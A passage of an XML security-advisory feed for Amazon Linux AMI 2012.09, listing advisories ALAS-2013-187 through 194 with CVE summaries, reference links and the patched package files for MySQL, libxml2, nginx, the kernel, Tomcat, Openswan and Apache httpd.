arch="i686"><filename>Packages/mysql51-embedded-devel-5.1.69-1.63.amzn1.i686.rpm</filename></package><package name="mysql51-devel" version="5.1.69" release="1.63.amzn1" epoch="0" arch="i686"><filename>Packages/mysql51-devel-5.1.69-1.63.amzn1.i686.rpm</filename></package><package name="mysql51-debuginfo" version="5.1.69" release="1.63.amzn1" epoch="0" arch="i686"><filename>Packages/mysql51-debuginfo-5.1.69-1.63.amzn1.i686.rpm</filename></package><package name="mysql51-libs" version="5.1.69" release="1.63.amzn1" epoch="0" arch="i686"><filename>Packages/mysql51-libs-5.1.69-1.63.amzn1.i686.rpm</filename></package><package name="mysql51-test" version="5.1.69" release="1.63.amzn1" epoch="0" arch="i686"><filename>Packages/mysql51-test-5.1.69-1.63.amzn1.i686.rpm</filename></package><package name="mysql51" version="5.1.69" release="1.63.amzn1" epoch="0" arch="i686"><filename>Packages/mysql51-5.1.69-1.63.amzn1.i686.rpm</filename></package><package name="mysql51-embedded" version="5.1.69" release="1.63.amzn1" epoch="0" arch="i686"><filename>Packages/mysql51-embedded-5.1.69-1.63.amzn1.i686.rpm</filename></package><package name="mysql51-common" version="5.1.69" release="1.63.amzn1" epoch="0" arch="i686"><filename>Packages/mysql51-common-5.1.69-1.63.amzn1.i686.rpm</filename></package><package name="mysql51-server" version="5.1.69" release="1.63.amzn1" epoch="0" arch="i686"><filename>Packages/mysql51-server-5.1.69-1.63.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2013-187</id><title>Amazon Linux AMI 2012.09 - ALAS-2013-187: important priority package update for mysql55</title><issued date="2013-04-25 20:40:00" /><updated date="2014-09-15 22:54:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2013-2392:
This update fixes several vulnerabilities in the MySQL database server. Information about these flaws can be found on the Oracle Critical Patch Update Advisory page, listed in the References section.
CVE-2013-2391:
This update fixes several vulnerabilities in the MySQL database server. Information about these flaws can be found on the Oracle Critical Patch Update Advisory page, listed in the References section.
CVE-2013-2389:
This update fixes several vulnerabilities in the MySQL database server. Information about these flaws can be found on the Oracle Critical Patch Update Advisory page, listed in the References section.
CVE-2013-2378:
This update fixes several vulnerabilities in the MySQL database server. Information about these flaws can be found on the Oracle Critical Patch Update Advisory page, listed in the References section.
CVE-2013-2375:
This update fixes several vulnerabilities in the MySQL database server. Information about these flaws can be found on the Oracle Critical Patch Update Advisory page, listed in the References section.
CVE-2013-1555:
This update fixes several vulnerabilities in the MySQL database server. Information about these flaws can be found on the Oracle Critical Patch Update Advisory page, listed in the References section.
CVE-2013-1552:
This update fixes several vulnerabilities in the MySQL database server. Information about these flaws can be found on the Oracle Critical Patch Update Advisory page, listed in the References section.
CVE-2013-1548:
This update fixes several vulnerabilities in the MySQL database server. Information about these flaws can be found on the Oracle Critical Patch Update Advisory page, listed in the References section.
CVE-2013-1544:
This update fixes several vulnerabilities in the MySQL database server. Information about these flaws can be found on the Oracle Critical Patch Update Advisory page, listed in the References section.
CVE-2013-1532:
This update fixes several vulnerabilities in the MySQL database server. Information about these flaws can be found on the Oracle Critical Patch Update Advisory page, listed in the References section.
CVE-2013-1531:
This update fixes several vulnerabilities in the MySQL database server. Information about these flaws can be found on the Oracle Critical Patch Update Advisory page, listed in the References section.
CVE-2013-1521:
This update fixes several vulnerabilities in the MySQL database server. Information about these flaws can be found on the Oracle Critical Patch Update Advisory page, listed in the References section.
CVE-2013-1506:
This update fixes several vulnerabilities in the MySQL database server. Information about these flaws can be found on the Oracle Critical Patch Update Advisory page, listed in the References section.
CVE-2012-5614:
This update fixes several vulnerabilities in the MySQL database server. Information about these flaws can be found on the Oracle Critical Patch Update Advisory page, listed in the References section.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-5614" title="" id="CVE-2012-5614" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-1506" title="" id="CVE-2013-1506" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-1521" title="" id="CVE-2013-1521" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-1531" title="" id="CVE-2013-1531" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-1532" title="" id="CVE-2013-1532" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-1544" title="" id="CVE-2013-1544" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-1548" title="" id="CVE-2013-1548" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-1552" title="" id="CVE-2013-1552" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-1555" title="" id="CVE-2013-1555" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2375" title="" id="CVE-2013-2375" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2378" title="" id="CVE-2013-2378" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2389" title="" id="CVE-2013-2389" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2391" title="" id="CVE-2013-2391" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2392" title="" id="CVE-2013-2392" type="cve" /><reference href="https://rhn.redhat.com/errata/RHSA-2013:0772.html" title="" id="RHSA-2013:0772" type="redhat" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="mysql55-embedded" version="5.5.31" release="1.32.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql55-embedded-5.5.31-1.32.amzn1.x86_64.rpm</filename></package><package name="mysql55" version="5.5.31" release="1.32.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql55-5.5.31-1.32.amzn1.x86_64.rpm</filename></package><package name="mysql55-libs" version="5.5.31" release="1.32.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql55-libs-5.5.31-1.32.amzn1.x86_64.rpm</filename></package><package name="mysql55-common" version="5.5.31" release="1.32.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql55-common-5.5.31-1.32.amzn1.x86_64.rpm</filename></package><package name="mysql55-devel" version="5.5.31" release="1.32.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql55-devel-5.5.31-1.32.amzn1.x86_64.rpm</filename></package><package name="mysql55-debuginfo" version="5.5.31" release="1.32.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql55-debuginfo-5.5.31-1.32.amzn1.x86_64.rpm</filename></package><package name="mysql55-server" version="5.5.31" release="1.32.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql55-server-5.5.31-1.32.amzn1.x86_64.rpm</filename></package><package name="mysql55-embedded-devel" version="5.5.31" release="1.32.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql55-embedded-devel-5.5.31-1.32.amzn1.x86_64.rpm</filename></package><package name="mysql55-test" version="5.5.31" release="1.32.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql55-test-5.5.31-1.32.amzn1.x86_64.rpm</filename></package><package name="mysql55-bench" version="5.5.31" release="1.32.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql55-bench-5.5.31-1.32.amzn1.x86_64.rpm</filename></package><package name="mysql55-embedded-devel" version="5.5.31" release="1.32.amzn1" epoch="0" arch="i686"><filename>Packages/mysql55-embedded-devel-5.5.31-1.32.amzn1.i686.rpm</filename></package><package name="mysql55-common" version="5.5.31" release="1.32.amzn1" epoch="0" arch="i686"><filename>Packages/mysql55-common-5.5.31-1.32.amzn1.i686.rpm</filename></package><package name="mysql55-embedded" version="5.5.31" release="1.32.amzn1" epoch="0" arch="i686"><filename>Packages/mysql55-embedded-5.5.31-1.32.amzn1.i686.rpm</filename></package><package name="mysql55-devel" version="5.5.31" release="1.32.amzn1" epoch="0" arch="i686"><filename>Packages/mysql55-devel-5.5.31-1.32.amzn1.i686.rpm</filename></package><package name="mysql55-debuginfo" version="5.5.31" release="1.32.amzn1" epoch="0" arch="i686"><filename>Packages/mysql55-debuginfo-5.5.31-1.32.amzn1.i686.rpm</filename></package><package name="mysql55-libs" version="5.5.31" release="1.32.amzn1" epoch="0" arch="i686"><filename>Packages/mysql55-libs-5.5.31-1.32.amzn1.i686.rpm</filename></package><package name="mysql55-bench" version="5.5.31" release="1.32.amzn1" epoch="0" arch="i686"><filename>Packages/mysql55-bench-5.5.31-1.32.amzn1.i686.rpm</filename></package><package name="mysql55" version="5.5.31" release="1.32.amzn1" epoch="0" arch="i686"><filename>Packages/mysql55-5.5.31-1.32.amzn1.i686.rpm</filename></package><package name="mysql55-server" version="5.5.31" release="1.32.amzn1" epoch="0" arch="i686"><filename>Packages/mysql55-server-5.5.31-1.32.amzn1.i686.rpm</filename></package><package name="mysql55-test" version="5.5.31" release="1.32.amzn1" epoch="0" arch="i686"><filename>Packages/mysql55-test-5.5.31-1.32.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2013-188</id><title>Amazon Linux AMI 2012.09 - ALAS-2013-188: medium priority package update for libxml2</title><issued date="2013-05-13 10:28:00" /><updated date="2014-09-15 23:02:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2013-0338:
libxml2 2.9.0 and earlier allows context-dependent attackers to cause a denial of service (CPU and memory consumption) via an XML file containing an entity declaration with long replacement text and many references to this entity, aka "internal entity expansion" with linear complexity.
A denial of service flaw was found in the way libxml2 performed string substitutions when entity values for entity references replacement was enabled. A remote attacker could provide a specially-crafted XML file that, when processed by an application linked against libxml2, would lead to excessive CPU consumption.
912400:
CVE-2013-0338 libxml2: CPU consumption DoS when performing string substitutions during entities expansion
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-0338" title="" id="CVE-2013-0338" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="libxml2-static" version="2.7.8" release="10.26.amzn1" epoch="0" arch="x86_64"><filename>Packages/libxml2-static-2.7.8-10.26.amzn1.x86_64.rpm</filename></package><package name="libxml2" version="2.7.8" release="10.26.amzn1" epoch="0" arch="x86_64"><filename>Packages/libxml2-2.7.8-10.26.amzn1.x86_64.rpm</filename></package><package name="libxml2-devel" version="2.7.8" release="10.26.amzn1" epoch="0" arch="x86_64"><filename>Packages/libxml2-devel-2.7.8-10.26.amzn1.x86_64.rpm</filename></package><package name="libxml2-debuginfo" version="2.7.8" release="10.26.amzn1" epoch="0" arch="x86_64"><filename>Packages/libxml2-debuginfo-2.7.8-10.26.amzn1.x86_64.rpm</filename></package><package name="libxml2-python" version="2.7.8" release="10.26.amzn1" epoch="0" arch="x86_64"><filename>Packages/libxml2-python-2.7.8-10.26.amzn1.x86_64.rpm</filename></package><package name="libxml2-debuginfo" version="2.7.8" release="10.26.amzn1" epoch="0" arch="i686"><filename>Packages/libxml2-debuginfo-2.7.8-10.26.amzn1.i686.rpm</filename></package><package name="libxml2-static" version="2.7.8" release="10.26.amzn1" epoch="0" arch="i686"><filename>Packages/libxml2-static-2.7.8-10.26.amzn1.i686.rpm</filename></package><package name="libxml2-devel" version="2.7.8" release="10.26.amzn1" epoch="0" arch="i686"><filename>Packages/libxml2-devel-2.7.8-10.26.amzn1.i686.rpm</filename></package><package name="libxml2" version="2.7.8" release="10.26.amzn1" epoch="0" arch="i686"><filename>Packages/libxml2-2.7.8-10.26.amzn1.i686.rpm</filename></package><package name="libxml2-python" version="2.7.8" release="10.26.amzn1" epoch="0" arch="i686"><filename>Packages/libxml2-python-2.7.8-10.26.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2013-189</id><title>Amazon Linux AMI 2012.09 - ALAS-2013-189: medium priority package update for nginx</title><issued date="2013-05-14 15:35:00" /><updated date="2014-09-15 23:31:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2013-2070:
http/modules/ngx_http_proxy_module.c in nginx 1.1.4 through 1.2.8 and 1.3.0 through 1.4.0, when proxy_pass is used with untrusted HTTP servers, allows remote attackers to cause a denial of service (crash) and obtain sensitive information from worker process memory via a crafted proxy response, a similar vulnerability to CVE-2013-2028.
962525:
CVE-2013-2070 nginx: denial of service or memory disclosure when using proxy_pass
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2070" title="" id="CVE-2013-2070" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="nginx" version="1.2.9" release="1.11.amzn1" epoch="1" arch="x86_64"><filename>Packages/nginx-1.2.9-1.11.amzn1.x86_64.rpm</filename></package><package name="nginx-debuginfo" version="1.2.9" release="1.11.amzn1" epoch="1" arch="x86_64"><filename>Packages/nginx-debuginfo-1.2.9-1.11.amzn1.x86_64.rpm</filename></package><package name="nginx-debuginfo" version="1.2.9" release="1.11.amzn1" epoch="1" arch="i686"><filename>Packages/nginx-debuginfo-1.2.9-1.11.amzn1.i686.rpm</filename></package><package name="nginx" version="1.2.9" release="1.11.amzn1" epoch="1" arch="i686"><filename>Packages/nginx-1.2.9-1.11.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2013-190</id><title>Amazon Linux AMI 2012.09 - ALAS-2013-190: medium priority package update for kernel</title><issued date="2013-05-14 15:37:00" /><updated date="2014-09-15 23:02:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2013-2094:
962792:
CVE-2013-2094 kernel: perf_swevent_enabled array out-of-bound access
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2094" title="" id="CVE-2013-2094" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="kernel-headers" version="3.4.43" release="43.43.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-headers-3.4.43-43.43.amzn1.x86_64.rpm</filename></package><package name="kernel" version="3.4.43" release="43.43.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-3.4.43-43.43.amzn1.x86_64.rpm</filename></package><package name="kernel-debuginfo-common-x86_64" version="3.4.43" release="43.43.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-debuginfo-common-x86_64-3.4.43-43.43.amzn1.x86_64.rpm</filename></package><package name="kernel-tools" version="3.4.43" release="43.43.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-3.4.43-43.43.amzn1.x86_64.rpm</filename></package><package name="kernel-tools-debuginfo" version="3.4.43" release="43.43.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-debuginfo-3.4.43-43.43.amzn1.x86_64.rpm</filename></package><package name="kernel-devel" version="3.4.43" release="43.43.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-devel-3.4.43-43.43.amzn1.x86_64.rpm</filename></package><package name="kernel-debuginfo" version="3.4.43" release="43.43.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-debuginfo-3.4.43-43.43.amzn1.x86_64.rpm</filename></package><package name="kernel-tools" version="3.4.43" release="43.43.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-3.4.43-43.43.amzn1.i686.rpm</filename></package><package name="kernel-headers" version="3.4.43" release="43.43.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-headers-3.4.43-43.43.amzn1.i686.rpm</filename></package><package name="kernel-debuginfo" version="3.4.43" release="43.43.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-debuginfo-3.4.43-43.43.amzn1.i686.rpm</filename></package><package name="kernel-tools-debuginfo" version="3.4.43" release="43.43.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-debuginfo-3.4.43-43.43.amzn1.i686.rpm</filename></package><package name="kernel-debuginfo-common-i686" version="3.4.43" release="43.43.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-debuginfo-common-i686-3.4.43-43.43.amzn1.i686.rpm</filename></package><package name="kernel-devel" version="3.4.43" release="43.43.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-devel-3.4.43-43.43.amzn1.i686.rpm</filename></package><package name="kernel" version="3.4.43" release="43.43.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-3.4.43-43.43.amzn1.i686.rpm</filename></package><package name="kernel-doc" version="3.4.43" release="43.43.amzn1" epoch="0" arch="noarch"><filename>Packages/kernel-doc-3.4.43-43.43.amzn1.noarch.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2013-191</id><title>Amazon Linux AMI 2012.09 - ALAS-2013-191: low priority package update for tomcat7</title><issued date="2013-05-24 13:55:00" /><updated date="2014-09-15 23:05:00" /><severity>low</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2013-2071:
961803:
CVE-2013-2071 tomcat: Information disclosure in asynchronous context when using AsyncListeners that threw RuntimeExceptions
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2071" title="" id="CVE-2013-2071" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="tomcat7-lib" version="7.0.40" release="1.26.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat7-lib-7.0.40-1.26.amzn1.noarch.rpm</filename></package><package name="tomcat7-jsp-2.2-api" version="7.0.40" release="1.26.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat7-jsp-2.2-api-7.0.40-1.26.amzn1.noarch.rpm</filename></package><package name="tomcat7-webapps" version="7.0.40" release="1.26.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat7-webapps-7.0.40-1.26.amzn1.noarch.rpm</filename></package><package name="tomcat7-javadoc" version="7.0.40" release="1.26.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat7-javadoc-7.0.40-1.26.amzn1.noarch.rpm</filename></package><package name="tomcat7-docs-webapp" version="7.0.40" release="1.26.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat7-docs-webapp-7.0.40-1.26.amzn1.noarch.rpm</filename></package><package name="tomcat7-admin-webapps" version="7.0.40" release="1.26.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat7-admin-webapps-7.0.40-1.26.amzn1.noarch.rpm</filename></package><package name="tomcat7-el-2.2-api" version="7.0.40" release="1.26.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat7-el-2.2-api-7.0.40-1.26.amzn1.noarch.rpm</filename></package><package name="tomcat7" version="7.0.40" release="1.26.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat7-7.0.40-1.26.amzn1.noarch.rpm</filename></package><package name="tomcat7-servlet-3.0-api" version="7.0.40" release="1.26.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat7-servlet-3.0-api-7.0.40-1.26.amzn1.noarch.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2013-192</id><title>Amazon Linux AMI 2012.09 - ALAS-2013-192: important priority package update for openswan</title><issued date="2013-05-24 13:56:00" /><updated date="2014-09-15 23:06:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2013-2053:
A buffer overflow flaw was found in Openswan. If Opportunistic Encryption were enabled ("oe=yes" in "/etc/ipsec.conf") and an RSA key configured, an attacker able to cause a system to perform a DNS lookup for an attacker-controlled domain containing malicious records (such as by sending an email that triggers a DKIM or SPF DNS record lookup) could cause Openswan's pluto IKE daemon to crash or, potentially, execute arbitrary code with root privileges. With "oe=yes" but no RSA key configured, the issue can only be triggered by attackers on the local network who can control the reverse DNS entry of the target system. Opportunistic Encryption is disabled by default.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2053" title="" id="CVE-2013-2053" type="cve" /><reference href="https://rhn.redhat.com/errata/RHSA-2013:0827.html" title="" id="RHSA-2013:0827" type="redhat" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="openswan" version="2.6.37" release="2.16.amzn1" epoch="0" arch="x86_64"><filename>Packages/openswan-2.6.37-2.16.amzn1.x86_64.rpm</filename></package><package name="openswan-debuginfo" version="2.6.37" release="2.16.amzn1" epoch="0" arch="x86_64"><filename>Packages/openswan-debuginfo-2.6.37-2.16.amzn1.x86_64.rpm</filename></package><package name="openswan-doc" version="2.6.37" release="2.16.amzn1" epoch="0" arch="x86_64"><filename>Packages/openswan-doc-2.6.37-2.16.amzn1.x86_64.rpm</filename></package><package name="openswan-doc" version="2.6.37" release="2.16.amzn1" epoch="0" arch="i686"><filename>Packages/openswan-doc-2.6.37-2.16.amzn1.i686.rpm</filename></package><package name="openswan-debuginfo" version="2.6.37" release="2.16.amzn1" epoch="0" arch="i686"><filename>Packages/openswan-debuginfo-2.6.37-2.16.amzn1.i686.rpm</filename></package><package name="openswan" version="2.6.37" release="2.16.amzn1" epoch="0" arch="i686"><filename>Packages/openswan-2.6.37-2.16.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2013-193</id><title>Amazon Linux AMI 2012.09 - ALAS-2013-193: medium priority package update for httpd</title><issued date="2013-05-24 13:56:00" /><updated date="2014-09-15 23:06:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2013-1862:
It was found that mod_rewrite did not filter terminal escape sequences from its log file. If mod_rewrite was configured with the RewriteLog directive, a remote attacker could use specially-crafted HTTP requests to inject terminal escape sequences into the mod_rewrite log file. If a victim viewed the log file with a terminal emulator, it could result in arbitrary command execution with the privileges of that user.
CVE-2012-4558:
Cross-site scripting (XSS) flaws were found in the mod_proxy_balancer module's manager web interface. If a remote attacker could trick a user, who was logged into the manager web interface, into visiting a specially-crafted URL, it would lead to arbitrary web script execution in the context of the user's manager interface session.
CVE-2012-3499:
Cross-site scripting (XSS) flaws were found in the mod_info, mod_status, mod_imagemap, mod_ldap, and mod_proxy_ftp modules. An attacker could possibly use these flaws to perform XSS attacks if they were able to make the victim's browser generate an HTTP request with a specially-crafted Host header.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-3499" title="" id="CVE-2012-3499" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-4558" title="" id="CVE-2012-4558" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-1862" title="" id="CVE-2013-1862" type="cve" /><reference href="https://rhn.redhat.com/errata/RHSA-2013:0815.html" title="" id="RHSA-2013:0815" type="redhat" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="httpd-devel" version="2.2.24" release="2.31.amzn1" epoch="0" arch="x86_64"><filename>Packages/httpd-devel-2.2.24-2.31.amzn1.x86_64.rpm</filename></package><package name="mod_ssl" version="2.2.24" release="2.31.amzn1" epoch="1" arch="x86_64"><filename>Packages/mod_ssl-2.2.24-2.31.amzn1.x86_64.rpm</filename></package><package name="httpd-debuginfo" version="2.2.24" release="2.31.amzn1" epoch="0" arch="x86_64"><filename>Packages/httpd-debuginfo-2.2.24-2.31.amzn1.x86_64.rpm</filename></package><package name="httpd-manual" version="2.2.24" release="2.31.amzn1" epoch="0" arch="noarch"><filename>Packages/httpd-manual-2.2.24-2.31.amzn1.noarch.rpm</filename></package><package name="httpd" version="2.2.24" release="2.31.amzn1" epoch="0" arch="x86_64"><filename>Packages/httpd-2.2.24-2.31.amzn1.x86_64.rpm</filename></package><package name="httpd-tools" version="2.2.24" release="2.31.amzn1" epoch="0" arch="x86_64"><filename>Packages/httpd-tools-2.2.24-2.31.amzn1.x86_64.rpm</filename></package><package name="httpd-debuginfo" version="2.2.24" release="2.31.amzn1" epoch="0" arch="i686"><filename>Packages/httpd-debuginfo-2.2.24-2.31.amzn1.i686.rpm</filename></package><package name="httpd" version="2.2.24" release="2.31.amzn1" epoch="0" arch="i686"><filename>Packages/httpd-2.2.24-2.31.amzn1.i686.rpm</filename></package><package name="mod_ssl" version="2.2.24" release="2.31.amzn1" epoch="1" arch="i686"><filename>Packages/mod_ssl-2.2.24-2.31.amzn1.i686.rpm</filename></package><package name="httpd-tools" version="2.2.24" release="2.31.amzn1" epoch="0" arch="i686"><filename>Packages/httpd-tools-2.2.24-2.31.amzn1.i686.rpm</filename></package><package name="httpd-devel" version="2.2.24" release="2.31.amzn1" epoch="0" arch="i686"><filename>Packages/httpd-devel-2.2.24-2.31.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2013-194</id><title>Amazon Linux AMI 2012.09 - ALAS-2013-194: medium priority package update for httpd24</title><issued date="2013-05-24 13:57:00" /><updated date="2014-09-15 23:07:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2013-1862:
It was found that mod_rewrite did not filter terminal escape sequences from its log file. If mod_rewrite was configured with the RewriteLog directive, a remote attacker could use specially-crafted HTTP requests to inject terminal escape sequences into the mod_rewrite log file. If a victim viewed the log file with a terminal emulator, it could result in arbitrary command execution with the privileges of that user.
CVE-2012-4558:
Cross-site scripting (XSS) flaws were found in the mod_proxy_balancer module's manager web interface. If a remote attacker could trick a user, who was logged into the manager web interface, into visiting a specially-crafted URL, it would lead to arbitrary web script execution in the context of the user's manager interface session.
CVE-2012-3499:
Cross-site scripting (XSS) flaws were found in the mod_info, mod_status, mod_imagemap, mod_ldap, and mod_proxy_ftp modules. An attacker could possibly use these flaws to perform XSS attacks if they were able to make the victim's browser generate an HTTP request with a specially-crafted Host header.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-3499" title="" id="CVE-2012-3499" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-4558" title="" id="CVE-2012-4558" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-1862" title="" id="CVE-2013-1862" type="cve" /><reference href="https://rhn.redhat.com/errata/RHSA-2013:0815.html" title="" id="RHSA-2013:0815" type="redhat" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="mod24_proxy_html" version="2.4.4" release="2.46.amzn1" epoch="1" arch="x86_64"><filename>Packages/mod24_proxy_html-2.4.4-2.46.amzn1.x86_64.rpm</filename></package><package name="httpd24-tools" version="2.4.4" release="2.46.amzn1" epoch="0" arch="x86_64"><filename>Packages/httpd24-tools-2.4.4-2.46.amzn1.x86_64.rpm</filename></package><package name="httpd24" version="2.4.4" release="2.46.amzn1" epoch="0" arch="x86_64"><filename>Packages/httpd24-2.4.4-2.46.amzn1.x86_64.rpm</filename></package><package name="mod24_ssl" version="2.4.4" release="2.46.amzn1" epoch="1" arch="x86_64"><filename>Packages/mod24_ssl-2.4.4-2.46.amzn1.x86_64.rpm</filename></package><package name="mod24_session" version="2.4.4" release="2.46.amzn1" epoch="0" arch="x86_64"><filename>Packages/mod24_session-2.4.4-2.46.amzn1.x86_64.rpm</filename></package><package name="httpd24-manual" version="2.4.4" release="2.46.amzn1" epoch="0" arch="noarch"><filename>Packages/httpd24-manual-2.4.4-2.46.amzn1.noarch.rpm</filename></package><package name="mod24_ldap" version="2.4.4" release="2.46.amzn1" epoch="0" arch="x86_64"><filename>Packages/mod24_ldap-2.4.4-2.46.amzn1.x86_64.rpm</filename></package><package name="httpd24-devel" version="2.4.4" release="2.46.amzn1" epoch="0" arch="x86_64"><filename>Packages/httpd24-devel-2.4.4-2.46.amzn1.x86_64.rpm</filename></package><package name="httpd24-debuginfo" version="2.4.4" release="2.46.amzn1" epoch="0" arch="x86_64"><filename>Packages/httpd24-debuginfo-2.4.4-2.46.amzn1.x86_64.rpm</filename></package><package name="httpd24-devel" version="2.4.4" release="2.46.amzn1" epoch="0" arch="i686"><filename>Packages/httpd24-devel-2.4.4-2.46.amzn1.i686.rpm</filename></package><package name="mod24_ldap" version="2.4.4" release="2.46.amzn1" epoch="0" arch="i686"><filename>Packages/mod24_ldap-2.4.4-2.46.amzn1.i686.rpm</filename></package><package name="httpd24-debuginfo" version="2.4.4" release="2.46.amzn1" epoch="0" arch="i686"><filename>Packages/httpd24-debuginfo-2.4.4-2.46.amzn1.i686.rpm</filename></package><package name="httpd24" version="2.4.4" release="2.46.amzn1" epoch="0" arch="i686"><filename>Packages/httpd24-2.4.4-2.46.amzn1.i686.rpm</filename></package><package name="mod24_session" version="2.4.4" release="2.46.amzn1" epoch="0" arch="i686"><filename>Packages/mod24_session-2.4.4-2.46.amzn1.i686.rpm</filename></package><package name="mod24_proxy_html" version="2.4.4" release="2.46.amzn1" epoch="1" arch="i686"><filename>Packages/mod24_proxy_html-2.4.4-2.46.amzn1.i686.rpm</filename></package><package name="httpd24-tools" version="2.4.4" release="2.46.amzn1" epoch="0" arch="i686"><filename>Packages/httpd24-tools-2.4.4-2.46.amzn1.i686.rpm</filename></package><package name="mod24_ssl" version="2.4.4" release="2.46.amzn1" epoch="1" 